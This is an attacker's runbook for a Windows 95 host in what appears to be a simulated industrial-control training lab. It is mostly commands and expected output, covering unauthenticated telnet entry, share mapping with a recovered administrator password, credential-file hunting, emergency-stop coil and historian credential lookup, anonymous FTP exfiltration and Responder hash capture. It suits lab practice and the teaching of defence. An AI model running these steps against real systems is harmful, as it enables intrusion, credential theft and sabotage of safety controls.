Runbook: hex-legacy-1¶

Entry¶

Telnet on port 23 drops directly into the Win95 shell with no login prompt. From any enterprise host:

TELNET 10.10.1.10

No username. No password. The service was configured open in 1999 and never revisited.

Share traversal (The “Open Door”)¶

Always start here. Engineering shares are often wide open.

C:\> NET VIEW

List all computers in the workgroup. Expect HEX-LEGACY-1 and UUPL-SRV-01.

C:\> NET VIEW \\HEX-LEGACY-1

See what this machine is sharing. The public share needs no credentials.

C:\> NET USE Z: \\HEX-LEGACY-1\public

Map the public share. Guest access: no username, no password required.

C:\> DIR Z:\ /s

Recursive directory dump. Pipe to a file for offline reading.

C:\> DIR Z:\ /s > list.txt

The private share is restricted. The Administrator password is in BACKUP.BAK, left on the C: drive since the 2003 migration and never deleted.

C:\> TYPE C:\PRIVATE\BACKUP.BAK

Shows the domain admin account recorded at migration time: Administrator / hex123.

C:\> NET USE Z: \\HEX-LEGACY-1\private hex123 /USER:Administrator

Maps the private share using the credential from BACKUP.BAK. Without credentials, the share returns Access Denied.

C:\> DIR Z:\ /s

Pre-mapped drives are already present: F: and G: both point at the public share. G: is the faster path if you do not want to map Z:.

Recursive file hunting¶

Run from C:\ or from any mapped drive. The C: drive root is the starting point.

Files with intelligence value on this machine¶

C:\> DIR /s *.log

Engineering logbook: LOGBOOK\ENGINEER.LOG contains every system password.

C:\> DIR /s *.cfg

Configuration files: PRIVATE\PLCACCS.CFG has historian, SCADA, and SSH credentials.

C:\> DIR /s *.ini

Windows INI files: WINDOWS\WIN.INI and WINDOWS\SYSTEM\PROTOCOL.INI.

C:\> DIR /s *.bak

Raw backups: PRIVATE\BACKUP.BAK, uncompressed, contains the domain admin password.

C:\> DIR /s *.csv

SCADA logs: UUPL\SCADA\LOGS.CSV, event log from 1999 to 2003.

C:\> DIR /s *.txt

Plain text: UUPL\NETWORK.TXT is the current network inventory including historian and SCADA IPs.

Files this machine does not have¶

These are standard searches worth running on any Win95 OT target; they come up empty here but confirm what is not present rather than what was missed.

C:\> DIR /s *.prj
C:\> DIR /s *.mdb
C:\> DIR /s *.zip
C:\> DIR /s *.rar

Vendor-name hunting¶

Project folders on OT machines are almost always named after the PLC brand.

C:\> DIR /s *siemens*
C:\> DIR /s *rockwell*
C:\> DIR /s *ab*
C:\> DIR /s *modicon*
C:\> DIR /s *schneider*
C:\> DIR /s *omron*

These return nothing on hex-legacy-1. The control system here is UU P&L proprietary; vendor-name hunting establishes that there is no third-party project tree to pivot into.

Generic OT keywords:

C:\> DIR /s *plc*
C:\> DIR /s *scada*
C:\> DIR /s *hmi*
C:\> DIR /s *historian*

*plc* returns PRIVATE\PLCACCS.CFG. The others return nothing: *scada*, *hmi*, and *historian* match no filenames. The SCADA logs sit at UUPL\SCADA\LOGS.CSV; the directory is named SCADA but the file is not.

Credential and config scraping¶

FIND searches inside files. Combine with DIR /s output for maximum coverage.

Find passwords inside text-based files¶

C:\> FIND /i "password" LOGBOOK\ENGINEER.LOG
C:\> FIND /i "pass" PRIVATE\PLCACCS.CFG
C:\> FIND /i "credential" UUPL\NETWORK.TXT

The first two return credential lines directly. The credential search in NETWORK.TXT returns the pointer to ENGINEER.LOG where all system passwords are consolidated.

From the mapped G: drive (public share):

C:\> FIND /i "pass" G:\LOGBOOK\ENGINEER.LOG
C:\> FIND /i "hist_read" G:\LOGBOOK\ENGINEER.LOG

hist_read / history2017 is the historian ingest credential. It appears only in ENGINEER.LOG, not in PLCACCS.CFG. It is the credential that unlocks the historian write endpoint.

Find IP addressing¶

C:\> FIND /i "10.10" UUPL\NETWORK.TXT
C:\> FIND /i "gateway" WINDOWS\SYSTEM\PROTOCOL.INI
C:\> FIND /i "10.10.2" G:\UUPL\NETWORK.TXT

Find Modbus and industrial protocol references¶

C:\> FIND /i "modbus" UUPL\PROCS.TXT
C:\> FIND /i "coil" UUPL\PROCS.TXT
C:\> FIND /i "trip" UUPL\SCADA\LOGS.CSV

PROCS.TXT names the emergency stop coil and the actuator IPs directly. LOGS.CSV is a SCADA event log from 1999 to 2003; searching for “trip” returns the relay B trip events.

Historian and SCADA database hunting¶

hex-legacy-1 does not host the historian database locally; it holds references to it.

C:\> DIR /s *.mdb
C:\> DIR /s *.dbf

Empty. Era-appropriate formats for 1999: *.mdb (Access) and *.dbf (dBASE/FoxPro). The historian runs on 10.10.2.10 and accepts HTTP queries. The credentials to reach it are in ENGINEER.LOG and PLCACCS.CFG.

Tag and signal list exports:

C:\> DIR /s *tag*.csv
C:\> DIR /s *point*.txt
C:\> DIR /s *io*.csv

LOGS.CSV is the closest equivalent: it is a SCADA event log with asset names, not a tag database.

Network and transfer commands¶

C:\> WINIPCFG

IP configuration. Shows the real MAC address (Adapter Address field), IP (10.10.1.10), subnet mask, and the real default gateway (populated from the enterprise network, not a placeholder).

C:\> ROUTE PRINT

Routing table. Confirms this machine sees only the enterprise segment (10.10.1.0/24).

C:\> ARP -a

ARP cache: shows recent contacts on the enterprise segment.

C:\> NBTSTAT -A 10.10.2.10

NetBIOS name lookup against the historian. Returns HISTORIAN-01.

C:\> NBTSTAT -A 10.10.1.20

Returns BURSAR-DESK: confirms the finance workstation is up and reachable.

C:\> FTP 10.10.1.10

At “Name” type anonymous. At “Password” type anything. Then navigate with cd LOGBOOK, get ENGINEER.LOG. Same files as the public SMB share.

TFTP client is present. No TFTP server runs on this machine; use FTP or SMB for file retrieval.

hist_read / history2017 is the ingest (write) credential. It appears only in ENGINEER.LOG, not in PLCACCS.CFG. Verifying it against the historian requires a machine with an HTTP client: wizzards-retreat or bursar-desk.

Realistic for Win95 OT?¶

No PowerShell. Everything is DIR, FIND, NET, COPY.

No WMI. Use NET commands instead.

No audit logging. Win95 systems did not log file access; there is no trail for DIR and FIND.

Plaintext everything. INI, CFG, LOG, TXT files throughout, none encrypted.

Shared drives are the attack surface. Map G: and the public share gives a complete network inventory and all system passwords. The private share adds the same credential list in a different format.

The NTLMv1 configuration means any captured authentication challenge can be cracked offline. Responder on the enterprise segment plus any browse operation by the machine produces crackable hashes.

Note¶

A single command dumps the entire C: drive listing for offline review:

C:\> DIR C:\ /s > C:\TEMP\c_drive_listing.txt

Then exfiltrate via FTP (anonymous on port 21) or copy to a mapped share on the attacker machine.

Quick reference¶

NET VIEW                              find machines in workgroup
NET USE Z: \\HEX-LEGACY-1\public     map public share (no password)
NET USE Z: \\HEX-LEGACY-1\private    map private share (Administrator / hex123)
DIR Z:\ /s > list.txt                dump everything
DIR /s *.log                         find ENGINEER.LOG (all passwords)
DIR /s *.cfg                         find PLCACCS.CFG (historian, SCADA, SSH)
DIR /s *.bak                         find BACKUP.BAK (domain admin password)
DIR /s *siemens*                     vendor hunting (empty on this host)
FIND /i "pass" LOGBOOK\ENGINEER.LOG  credential scrape
FIND /i "hist_read" G:\LOGBOOK\ENGINEER.LOG   ingest credential (logbook only)
WINIPCFG                             own IP, real MAC, and real default gateway
ROUTE PRINT                          routing table
NBTSTAT -A 10.10.2.10                historian NetBIOS name
FTP 10.10.1.10                       anonymous FTP (Name: anonymous, Password: anything)